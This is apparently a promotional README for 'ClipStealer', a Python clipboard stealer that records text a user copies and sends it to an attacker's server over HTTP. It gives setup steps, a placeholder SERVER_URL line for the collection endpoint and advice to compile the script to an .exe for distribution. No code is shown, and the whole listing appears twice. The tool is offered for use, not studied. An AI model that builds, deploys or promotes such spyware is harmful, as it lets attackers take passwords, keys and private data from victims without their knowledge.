This script allows you to intercept data from the clipboard and send it to a remote server.
Features:
Clipboard monitoring.
Saving text copied by the user.
Sending data to the server via HTTP requests.
Requirements:
Python 3.9+
Usage:
Installing dependencies from the folder with the script: pip install -r requirements.txt
In ClipStealer.py, specify your server:
SERVER_URL = 'example_url/api/clipboard'
Starting the server: python server.py
It is better to recompile the ClipStealer.py file into .exe format.
download:
Features:
Clipboard monitoring.
Saving text copied by the user.
Sending data to the server via HTTP requests.
Requirements:
Python 3.9+
Usage:
Installing dependencies from the folder with the script: pip install -r requirements.txt
In ClipStealer.py, specify your server:
SERVER_URL = 'example_url/api/clipboard'
Starting the server: python server.py
It is better to recompile the ClipStealer.py file into .exe format.
download: